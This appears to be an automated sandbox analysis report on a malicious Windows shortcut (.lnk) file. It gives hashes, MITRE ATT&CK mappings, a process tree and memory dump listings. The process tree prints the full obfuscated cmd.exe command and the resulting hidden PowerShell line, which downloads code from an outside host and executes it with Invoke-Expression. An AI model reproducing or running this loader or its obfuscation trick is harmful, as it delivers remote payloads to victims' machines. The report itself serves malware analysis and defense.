6af02d867cca71be8a87383d128c50dc20900cf700400614bc164dc2024e1f81

General

Target

6af02d867cca71be8a87383d128c50dc20900cf700400614bc164dc2024e1f81.lnk
Size

6KB
MD5

94515fb8d1628b442fcf7627355894dc
SHA1

f396bf8c24225af66895b760b1b0a117b3237078
SHA256

6af02d867cca71be8a87383d128c50dc20900cf700400614bc164dc2024e1f81
SHA512

e440a63087ffd9346f14122fd55db0cb790256dc2cf8e5ede513645cf63c9d5954b7182e909619e74fb8cd0fa4a6b7c2dbbba40114008c3e382384fb8289c561
SSDEEP

192:85tffEjIAjoud8So55oChD4ARU0ffosyZOLhDRjzf4oU8LL4SosOhYhz9TosOhCf:sKX

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2724	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2968 wrote to memory of 2864	2968	cmd.exe	29
PID 2968 wrote to memory of 2864	2968	cmd.exe	29
PID 2968 wrote to memory of 2864	2968	cmd.exe	29
PID 2864 wrote to memory of 2724	2864	cmd.exe	30
PID 2864 wrote to memory of 2724	2864	cmd.exe	30
PID 2864 wrote to memory of 2724	2864	cmd.exe	30

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\6af02d867cca71be8a87383d128c50dc20900cf700400614bc164dc2024e1f81.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /v /c "set "w=""oruWl'O4N$ f29eR0iTgy.cdtPDLEBbSvpKMhwCn7-;=YVsQxAH:/Gam5UkIF" && set "blfnrp=!w:~40,1!!w:~51,1!!w:~6,1!!w:~6,1!!w:~12,1!" && !blfnrp! !w:~48,1!!w:~20,1!!w:~56,1!!w:~3,1!!w:~20,1!!w:~12,1!!w:~54,1!!w:~37,1!!w:~61,1!!w:~41,1!!w:~12,1!!w:~0,1!!w:~0,1!!w:~12,1!!w:~27,1!!w:~8,1!!w:~39,1!!w:~30,1!!w:~3,1!!w:~33,1!!w:~52,1!!w:~16,1!!w:~6,1!!w:~6,1!!w:~12,1!!w:~43,1!!w:~5,1!!w:~19,1!!w:~10,1!!w:~28,1!!w:~8,1!!w:~39,1!!w:~33,1!!w:~20,1!!w:~46,1!!w:~6,1!!w:~30,1!!w:~12,1!!w:~52,1!!w:~61,1!!w:~28,1!!w:~28,1!!w:~30,1!!w:~41,1!!w:~12,1!!w:~43,1!!w:~10,1!!w:~8,1!!w:~29,1!!w:~8,1!!w:~55,1!!w:~2,1!!w:~12,1!!w:~43,1!!w:~10,1!!w:~8,1!!w:~27,1!!w:~17,1!!w:~2,1!!w:~62,1!!w:~19,1!!w:~29,1!!w:~30,1!!w:~12,1!!w:~43,1!!w:~30,1!!w:~50,1!!w:~16,1!!w:~24,1!!w:~4,1!!w:~20,1!!w:~61,1!!w:~2,1!!w:~41,1!!w:~27,1!!w:~2,1!!w:~6,1!!w:~61,1!!w:~24,1!!w:~22,1!!w:~12,1!!w:~32,1!!w:~46,1!!w:~35,1!!w:~56,1!!w:~48,1!!w:~33,1!!w:~12,1!!w:~43,1!!w:~40,1!!w:~2,1!!w:~57,1!!w:~37,1!!w:~51,1!!w:~41,1!!w:~25,1!!w:~12,1!!w:~0,1!!w:~11,1!!w:~40,1!!w:~2,1!!w:~41,1!!w:~26,1!!w:~30,1!!w:~10,1!!w:~26,1!!w:~12,1!!w:~45,1!!w:~12,1!!w:~61,1!!w:~41,1!!w:~47,1!!w:~8,1!!w:~36,1!!w:~30,1!!w:~43,1!!w:~5,1!!w:~16,1!!w:~31,1!!w:~17,1!!w:~30,1!!w:~49,1!!w:~4,1!!w:~16,1!!w:~48,1!!w:~20,1!!w:~12,1!!w:~43,1!!w:~59,1!!w:~17,1!!w:~61,1!!w:~12,1!!w:~7,1!!w:~38,1!!w:~26,1!!w:~26,1!!w:~35,1!!w:~53,1!!w:~54,1!!w:~54,1!!w:~57,1!!w:~2,1!!w:~4,1!!w:~41,1!!w:~26,1!!w:~56,1!!w:~19,1!!w:~41,1!!w:~56,1!!w:~41,1!!w:~25,1!!w:~48,1!!w:~16,1!!w:~56,1!!w:~23,1!!w:~2,1!!w:~41,1!!w:~6,1!!w:~19,1!!w:~41,1!!w:~16,1!!w:~54,1!!w:~56,1!!w:~35,1!!w:~19,1!!w:~54,1!!w:~13,1!!w:~19,1!!w:~6,1!!w:~16,1!!w:~25,1!!w:~56,1!!w:~26,1!!w:~56,1!!w:~54,1!!w:~35,1!!w:~48,1!!w:~54,1!!w:~25,1!!w:~18,1!!w:~9,1!!w:~16,1!!w:~14,1!!w:~58,1!!w:~13,1!!w:~25,1!!w:~25,1!!w:~16,1!!w:~15,1!!w:~9,1!!w:~25,1!!w:~32,1!!w:~14,1!!w:~13,1!!w:~56,1!!w:~32,1!!w:~14,1!!w:~18,1!!w:~18,1!!w:~16,1!!w:~42,1!!w:~24,1!!w:~15,1!!w:~32,1!!w:~58,1!!w:~58,1!!w:~25,1!!w:~13,1!!w:~14,1!!w:~58,1!!w:~7,1!!w:~12,1!!w:~43,1!!w:~59,1!!w:~48,1!!w:~16,1!!w:~31,1!!w:~56,1!!w:~48,1!!w:~19,1!!w:~24,1!!w:~27,1!!w:~56,1!!w:~17,1!!w:~33,1!!w:~61,1!!w:~41,1!!w:~21,1!!w:~44,1!!w:~61,1!!w:~10,1!!w:~34,1!!w:~2,1!!w:~60,1!!w:~16,1!!w:~43,1!!w:~30,1!!w:~50,1!!w:~27,1!!w:~3,1!!w:~16,1!!w:~33,1!!w:~48,1!!w:~19,1!!w:~8,1!!w:~41,1!!w:~12,1!!w:~11,1!!w:~40,1!!w:~2,1!!w:~10,1!!w:~26,1!!w:~16,1!!w:~10,1!!w:~26,1!!w:~23,1!!w:~40,1!!w:~8,1!!w:~41,1!!w:~20,1!!w:~16,1!!w:~41,1!!w:~26,1!!w:~44,1!!w:~0,1!"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POwErSHell -WiNDOwSTYlE HIDDEn -NOLOGo -NOPRoFiLE -ExecuTIonPolIcy bYpasS -ComMAnd "$ContENt = InVOKE-WeBREQuesT -URI 'http://mountainandsea.online/api/filedata/ps/d04e25fdde94db2fab200e7c9b55df25' -UseBasicPaRSIng;INvoke-ExPreSsiOn $CoNteNt.COnTent;"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2724-41-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

Filesize
2.9MB

Download
memory/2724-42-0x00000000024F0000-0x00000000024F8000-memory.dmp

Filesize
32KB

Download
memory/2724-43-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-44-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2724-45-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2724-46-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2724-47-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2724-48-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2724-49-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2724-50-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing